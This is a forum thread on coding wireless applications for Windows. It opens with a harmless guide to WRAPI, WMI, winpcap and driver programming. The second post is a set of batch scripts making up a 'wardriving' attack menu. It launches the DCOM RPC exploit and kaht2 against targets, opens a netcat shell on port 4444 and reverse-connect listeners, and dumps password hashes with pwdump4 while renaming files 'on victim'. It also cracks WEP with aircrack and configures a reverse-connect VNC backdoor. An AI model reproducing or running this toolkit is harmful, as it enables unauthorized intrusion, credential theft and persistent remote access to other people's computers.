Forums: Wireless Apps In Windows - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Wireless Apps In Windows A quick guide to coding them...

#1 User is offline   IDEspinner 

  • Sergeant
  • Icon
  • Group: Specialist
  • Posts: 212
  • Joined: 16-October 04

Posted 21 October 2004 - 09:17 PM

Seeing the lack of posts in this forum makes me sad... so i will help fill it up

Coding Wireless applications in windows.

Alright, when you are trying to code your very own netstumbler there are a few choices out there for you to use. Making a netstumbler clone is honestly pretty simple.

1.: Use WRAPI.

Quote

WRAPI is a software library that allows applications running in user space on mobile end stations to query information about the IEEE 802.11 network they are attached to. WRAPI 1.0 is implemented on the Windows XP operating system and is a hardware-independent tool that works with any IEEE 802.11b wireless network hardware vendor.
you can get wrapi here
hxxp://ramp.ucsd.edu/pawn/wrapi/

If you use wrapi, you have the advantage that it is guaranteed to work regardless of any wireless card. the downside, you must use xp. WRAPI is a fairly straightforware to use library with a nice set of functions. You can easily make a netstumbler clone with this in any language of your choice(after you compile wrapi)

A major drawback to using wrapi is that you must have the windows ddk, not everybody has it, but it is free(minus shipping and handling?)
get it here:
hxxp://www.microsoft.com/whdc/devtools/ddk/orderddkcd.mspx

2: Use the WMI
When the shmoo group presented their presentation at toorcon, i was definatley intrigued because even though i knew all of it already, i never thought to use it. WMI has many functions that support alot of wireless applications. Your netstumbler clone in vbscript couldnt be easier. To see a quick example of the functions that are provided you can just go to
start -> run -> "wbemtest" -> click connect -> under namespace put "root\wmi"
click "enum classes" -> click recursive -> click ok

now here you see all the functions you are entitled to, specifically, scroll down to the
"MSNdis_80211_" fields, look at all those wireless functions... hmm i wonder what we could do with those ;) use your imagination.

If you want source i found this example: "Wireless Signal Strength"
hxxp://www.samurize.com/modules/ipboard/index.php?showtopic=2505&st=0

3. use winpcap
just because its not specifically for wireless, and you cant grab management frames doesnt make it useless.

Airsnare is a good example of this:
hxxp://home.comcast.net/~jay.deboer/airsnare/

Quote

AirSnare is another tool to add to your Wireless Intrusion Detection Toolbox.  AirSnare will alert you to unfriendly MAC addresses on your network and will also alert you to DHCP requests taking place.  If AirSnare detects an unfriendly MAC address you have the option of tracking the MAC address's access to IP addresses and ports or by launching Ethereal upon a detection.


using winpcap found at
hxxp://winpcap.polito.it/
you can still code many useful utilities.

4. Driver/ndis programming
Yep, last resort, but is it really that difficult?
Probably, but ir you recall a recent post of mine regarding hostap for windows, you may recall a neat app called prisma. If you happen to own a prism 2 based card you can easily build off the source, since its included. Infact, if you have anything to add, im sure they could use your help.

Quote

26/06/2004

Help needed for WEP cracking on windows !
I wrote a quick and dirty sample program to control Prism2 based cards using the Winpcap protocol driver and the PacketRequest API. WEP cracking requires the capture of 802.11 frames; this program shows how to set those cards into HostAP and monitor mode and contains functions to get/set parameters of  the Prism2 chipset. The FULL SOURCE CODE for Visual C++ is included, I hope that you can help me on some topics and problems I found. The code should compile without problems but to test the program you need a Prism2 based card and the Winpcap driver installed.
You can download Prisma here.


You can download Prisma here:
hxxp://www.oxid.it/downloads/Prisma_v1.0.zip


So wrapping it up, are you really limited on windows?

yes. :blink:

ok but atleast you have many options still available to you, go out and code me a great app using a combination of all these methods, its 100 percent possible!
0

#2 User is offline   midnightsavage 

  • Private
  • Icon
  • Group: Members
  • Posts: 9
  • Joined: 05-February 04

Posted 23 November 2004 - 09:59 PM

Well this is my first post so I hope someone gets something out of it. I don't know a lot about hacking and only basic programming so no flames please. You have to configure you program locations in the other batch files and you have to configure you wireless network name for the change ip part. I wrote these bat files to give me a central interface when I was wardriving. Comments or improvements are appreciated.

In order to use you must have these programs.

aircrack.exe
airodump.exe
cain.exe
netstumbler.exe
nmap.exe
pwdump4.exe google
tftpd32.exe google
kaht2.exe google
nc.exe google
winfo.exe google
DcomExploit.exe google
installer.exe and client.exe from institution 2004 vnc package VNC



All the batch file name must be named the same unless you want to change the code.


This is wireless.bat
color 0a
rem I hardly consider myself a hacker of any sort. I put this together because i wanted 

rem a central interface when I was wardriving. Windows batch programming is hardly 

rem programming and I wish I could have wrote this in REAL code. I would advise 
rem against trying to break into a company of any size.They have the technology to 
rem catch you. HAVE FUN!

:start
title Welcome to the MATRIx:
@echo off
echo
echo
cls
echo                  +----------------------------------------------------+
echo                  =           WIRLE$$ TE$T KIT                         =
echo                  =        STRESSFRACTURE                              =  
echo                  =           stress_fracture@excite.com               =
echo                  +----------------------------------------------------+                                 

                   
echo /) Local IP Configuration                ') Dcom Exploit Connect
echo.                                                                           
echo .) Net View                             ;) VNC Server Edit                                                 

                              
echo ,) NMAP Scan                             L) Start TFTP Server
echo.                                             
echo M) Trace Route                           K) VNC Client
echo.   
echo N) Netcat Listener                       J) Air Dump
echo.   
echo B) Hack Server                           H) Air Crack
echo.   
echo V) ARP cache                             G) Cain
echo.   
echo C) KAHT2                                 F) IP Renew
echo.  
echo X) Dcom Exploit                          D) Command Prompt
echo.   
echo.Q) Open Directory                        S) PWDUMP4
echo. 
echo.A) Netstumbler                           \) Winfo
echo.
echo.]) Change IP                             Z) Exit
echo.   


:choice
set /p c=                                $: 
if "%C%"=="/" goto localip
if "%C%"=="." goto shares 
if "%C%"=="," goto nmap
if "%C%"=="m" goto traceroute
if "%C%"=="n" goto netcat
if "%C%"=="b" goto server
if "%C%"=="v" goto arp
if "%C%"=="c" goto kaht2
if "%C%"=="x" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="l" goto tftp
if "%C%"=="k" goto vncclient
if "%C%"=="j" goto airdump
if "%C%"=="h" goto aircrack
if "%C%"=="g" goto cain
if "%C%"=="f" goto iprenew
if "%C%"=="q" goto opendir
if "%C%"=="d" goto command
if "%C%"=="s" goto pwdump
if "%C%"=="a" goto netstumbler
if "%C%"=="\" goto winfo
if "%C%"=="]" goto ipchange
if "%C%"=="z" goto :eof

if "%C%"=="/" goto localip
if "%C%"=="." goto shares 
if "%C%"=="," goto nmap
if "%C%"=="M" goto traceroute
if "%C%"=="N" goto netcat
if "%C%"=="B" goto server
if "%C%"=="V" goto arp
if "%C%"=="C" goto kaht2
if "%C%"=="X" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="L" goto tftp
if "%C%"=="K" goto vncclient
if "%C%"=="J" goto airdump
if "%C%"=="H" goto aircrack
if "%C%"=="G" goto cain
if "%C%"=="F" goto iprenew
if "%C%"=="D" goto command
if "%C%"=="Q" goto opendir
if "%C%"=="S" goto pwdump
if "%C%"=="A" goto netstumbler
if "%C%"=="|" goto winfo
if "%C%"=="}" goto ipchange
if "%C%"=="Z" goto :eof


:localip
cls
@echo off
ipconfig 
pause
goto :start
:shares
cls

@echo off
rem this doent usually work
net view 
echo Enter Target:
set /p netviewtarget=
net view  %netviewtarget%
pause
goto :start
:nmap
rem nmap has to be in the same directory as wireless.bat or you can change directory 

with cd
cls
rem nmap settings can be changed, these are just what I like to use.
@echo off
set /p scantarget=Enter Target:
@echo Enter Scan Type:
@echo S -sS
@echo T -sT
@echo V -sV
@echo Must be Capitol
set /p scantype=

nmap -s%scantype% -P0 -T Insane -vv  %scantarget%
pause

goto :start

:traceroute

@echo off
set /p tracetarget=Enter Target:
tracert %tracetarget%
pause
goto :start

:netcat
rem netcat must be in the same directory
@echo Enter port:
set /p port=
start "Netcat listening on port %port%" /MIN nc -v -t -l -p %port% -L
echo Netcat server started on port %port%
pause
goto :start

:server
rem ports  used for reverse connect backs. Put whatever you want here.
start /MIN nc -t -v -l -p  80 -L
start /MIN nc -t -v -l -p  666 -L
start /MIN nc -t -v -l -p  8080 -L
start /MIN nc -t -v -l -p  9999 -L
start /MIN nc -t -v -l -p 22178 -L
start /MIN nc -t -v -l -p 31337 -L
echo Netcat listening on ports 80, 666, 8080, 9999, 22178, 31337...
pause
goto :start
:arp
arp -a
pause 
goto :start

:kaht2
set /p  ip1=First IP Address:
set /p ip2=Second IP Address:
start kaht2 %ip1% %ip2%
goto :start

:dcomexploit
echo 0 win32 2000 SP0
echo 1 win32 2000 SP1
echo 2 win32 2000 SP2
echo 3 win32 2000 SP3
echo 4 win32 2000 SP4
echo 5 win32 XP SP0
echo 6 win32 XP SP1
echo Shell on port 4444 if exploit succesful
set /p  targetid=Enter Version:
set /p  address=Enter IP:
echo Shell on port 4444 if exploit succesful
start dcomexploit %targetid% %address%

goto :start 

:dcomconnect
rem this is for a computer exploited with dcomexploit above.
set /p target=Enter Target:
start  nc %target% 4444
goto :start

 :vncedit
start vncedit.bat
goto :start

:tftp
rem I always keep tftp32 in my program directory but you can change it to wherever its 

at
rem in caes your wondering tftp is for transfering files ex   "tftp -i server get filename" 

or  "tftp -i server put filename"   usually takes a couple of tries on rem victim if you get  

unexpected block errors

start /min tftpd32.exe
goto  :start

:vncclient
start /min client.exe
goto :start

:airdump
start airodump.bat
goto :start

:aircrack
rem edit aircrack location in aircrack.bat
start aircrack.bat
goto :start
 
:cain
rem Cain can be found at  http:\\www.oxid.it
rem Edit the location where cain is located in cain.bat
start cain.bat
goto :start

:iprenew
rem this renews your IP address on a DHCP enabled AP
start /min ipconfig /renew
goto :start

:opendir
start opendir.bat
goto :start
 
:command
start 
goto :start

:pwdump
cls
echo off
set   target=0
set   share=0
set   output=0
set   username=0
set   rename=0
set /p  target=Enter Target IP:
set /p  share=Enter Share:
set /p output=Enter Output File Name:
set /p username=Enter Username:
set /p rename=Rename Files on Victim to:
pwdump4 %target% /s:%share% /o:%output% /u:%username% /r:%newname%
pause
goto :start

:netstumbler
start netstumbler.bat
goto :start

:winfo
cls
set /p target=Enter Target:
set /p textfile=Enter text file Prefix:
set /p var=Use Null Session(y/n)
if "%var%"=="y"  winfo %target% -n -v >> %textfile%.txt 
if "%var%"=="n"  winfo %target%  -v  >> %textfile%.txt
start  %textfile%.txt
goto :start

:ipchange 
start ipchange.bat
goto :start



This is airodump.bat
echo  off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start  airodump 
exit

This is cain.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

cd\
cd program files\y.bin\cain
start  cain.exe
exit





This is ipchange.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

echo off
rem You have to edit Orinoco for the name of your connection

set /p x=DHCP 1     STATIC 2      :
if "%x%"=="1" goto dhcp
if "%x%"=="2" goto static



:static
echo off
set /p ip=Enter new IP:
echo.
set /p sm=Enter Subnet Mask:
echo.
set /p gw=Enter Default Gateway:
netsh interface ip set dns  "Orinoco" static %gw% 
netsh interface ip set address "Orinoco" static %ip% %sm% %gw% 1


:dhcp
netsh interface ip set dns name="Orinoco" source=dhcp
netsh interface ip set  address name="Orinoco" source=dhcp

pause


exit






This is netstumbler.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
cd\
cd program files\network stumbler
start  netstumbler.exe
exit

This is explorer.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
start explorer c:\documents and settings\travis\desktop\hacktools\hacktoolsx
exit





This is installer.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

echo off
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\tftp
rem This edits the Institution VNC reverse connect back vnc server
echo.
echo.
@echo Reverse VNC connect Listener Editor
echo.
echo.
set /p ip=Enter your IP:
set /p port=Enter Port Client Listening on:
installer.exe -e "dll32"  %ip% %port%
exit




This is aircrack.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start aircrack
exit


I would post every thing you need here but alas I am limited by the restrictions on this forum :rolleyes:
0

#3 User is offline   320X 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 473
  • Joined: 13-December 03

Posted 07 November 2005 - 06:42 PM

midnightsavage the bad of the airodump its doesnt work with prism chipsets in windows, only to say is a windows program to add to this collection names aire, i will add later with the name aire.rar in the download section
0

#4 User is offline   wootski 

  • Private
  • Icon
  • Group: Members
  • Posts: 2
  • Joined: 14-May 07

Posted 11 June 2007 - 07:00 PM

Meh, You can now inject on windows as it was ported to cygwin (although it does crash eaisily). Should make a video of your scripts in use :)

p.s whats the difference between the normal dcomexploit.exe and kaht2.exe ?
0

#5 User is offline   hugopnr 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 112
  • Joined: 11-July 07

Posted 13 July 2007 - 06:17 AM

One thing I wanted to add,
If you just want to develop a program which does some generic network operation over a wireless network (like sending & receiving data) there wouldn't be ANY difference between your ordinary net code and wireless code. But if you want to do some specific 802.11 operation you should consider doing what the post said ...
"Power tends to corrupt, and absolute power corrupts absolutely. Great men are almost always bad men." -LORD ACTON
hugo.pnr~
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting